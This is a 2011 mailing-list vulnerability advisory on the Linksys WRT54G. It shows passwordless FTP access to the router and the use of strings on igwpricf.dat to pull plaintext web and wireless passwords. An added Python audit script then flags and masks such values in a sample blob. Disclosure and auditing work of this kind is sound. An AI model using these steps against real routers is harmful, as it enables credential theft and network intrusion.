Message-Id: <201104090015.p390Fa8H026718@www5.securityfocus.com>
Date: Fri, 8 Apr 2011 18:15:36 -0600
From: rafdw@...zta.fm
To: bugtraq@...urityfocus.com
Subject: Linksys WRT54G - read router password from file placed on FTP

Environment: Linksys WRT54G - Firmware Version: v7.00.1 


The default settings of the Linksys WRT54G allow FTP access without a password:


rafal@...alhost ~ $ lftp 192.168.1.1
lftp 192.168.1.1:~> dir
  size          date       time       name
--------       ------     ------    --------
  956756    Jan-01-2003  02:13:12   ap61.sys          
  224664    Jan-01-2003  02:13:24   igwhtm.dat        
   28528    Jan-01-2003  02:13:26   langpak_en        
   28482    Apr-08-2011  15:36:44   igwpricf.dat      
    2520    Apr-08-2011  15:11:02   nvram.cfg         
    2046    Dec-24-2001  00:02:42   calibra.dat       

lftp 192.168.1.1:~> 


It is possible to download the igwpricf.dat file (and another), where the plain-text passwords for web access and the wireless network are kept.


rafal@...alhost ~ $ strings igwpricf.dat
Linksys
IntotoSoft
192.168.50.3
...
Aadmin
PASSWORD
test
best
...
WIRELESS_PASSWORD
...
default
langpak_en
TELNET
HTTP
SMTP
POP3


-----------------
RaFD
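
An added example, not part of the original message: an audit check that scans a configuration export for printable values stored right after the PASSWORD and WIRELESS_PASSWORD markers seen in the strings output above, reporting them masked. The sample blob, the 16-byte window and all function names are assumptions made for illustration; the real layout of igwpricf.dat is not documented in the message.

```python
import re

# Same idea as strings(1): runs of at least four printable ASCII bytes.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def printable_runs(blob):
    """Return (start, end, text) for every printable run in a binary blob."""
    return [(m.start(), m.end(), m.group().decode("ascii"))
            for m in PRINTABLE_RUN.finditer(blob)]


def is_marker(text):
    # PASSWORD and WIRELESS_PASSWORD are the markers visible in the message.
    return "PASSWORD" in text.upper()


def mask(value):
    """Keep only the first character so the report does not leak the secret."""
    return value[0] + "*" * (len(value) - 1)


def find_plaintext_secrets(blob, window=16):
    """Flag printable strings that start within `window` bytes after a marker.

    Assumption: values sit next to their marker, as the strings output
    suggests; the window size is a heuristic, not a documented format.
    """
    runs = printable_runs(blob)
    findings = []
    for i, (_, marker_end, marker) in enumerate(runs):
        if not is_marker(marker):
            continue
        for start, _, value in runs[i + 1:]:
            if start - marker_end > window or is_marker(value):
                break
            findings.append((marker, start, mask(value)))
    return findings


# Constructed sample, not a real router file: placeholder values only.
SAMPLE = (b"\x00\x01Linksys\x00\x00IntotoSoft\x00\x07Aadmin\x00PASSWORD\x00\x02"
          b"test\x00best\x00\x00\xff\xfeWIRELESS_PASSWORD\x00\x10examplewifikey"
          b"\x00\x03default\x00")

if __name__ == "__main__":
    for marker, offset, masked in find_plaintext_secrets(SAMPLE):
        print(f"{marker}: plaintext value at offset {offset}: {masked}")
```

An empty result means no printable value follows a marker, which is what a configuration file that stores only hashed or encrypted credentials should produce.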

